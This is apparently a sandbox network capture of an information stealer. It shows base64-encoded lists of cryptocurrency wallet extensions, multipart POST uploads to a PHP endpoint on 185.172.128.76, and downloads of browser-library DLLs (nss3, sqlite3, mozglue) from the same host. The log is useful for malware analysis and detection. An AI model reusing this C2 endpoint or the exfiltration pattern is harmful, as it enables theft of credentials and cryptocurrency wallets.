qY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Apr 27, 2024 01:31:16.462368011 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 27, 2024 01:31:16.462405920 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 27, 2024 01:31:16.462503910 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 27, 2024 01:31:16.462582111 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 27, 2024 01:31:16.687830925 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE Host: 185.172.128.76 Content-Length: 8359 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:31:16.687913895 CEST	8359	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 27, 2024 01:31:16.997889042 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:31:17.260422945 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:31:17.540066004 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:17 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 27, 2024 01:31:17.540201902 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 27, 2024 01:31:17.540251017 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 27, 2024 01:31:17.540326118 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 27, 2024 01:31:17.540375948 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 27, 2024 01:31:27.378573895 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAF Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:31:27.686438084 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:31:27.794853926 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 01:31:28.099020004 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:31:28.211787939 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b [TRUNCATED] Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
Apr 27, 2024 01:31:28.522394896 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:31:31.288098097 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGI Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 [TRUNCATED] Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
Apr 27, 2024 01:31:31.591976881 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 01:31:31.789865017 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:31:32.070154905 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:31 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
Apr 27, 2024 01:31:36.229562998 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:31:36.512185097 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:36 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
Apr 27, 2024 01:31:39.473526955 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:31:39.753586054 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:39 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
Apr 27, 2024 01:31:41.982009888 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:31:42.261235952 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:42 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 27, 2024 01:32:00.918885946 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:32:01.198822021 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:01 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
Apr 27, 2024 01:32:02.654565096 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 01:32:02.935641050 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:02 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
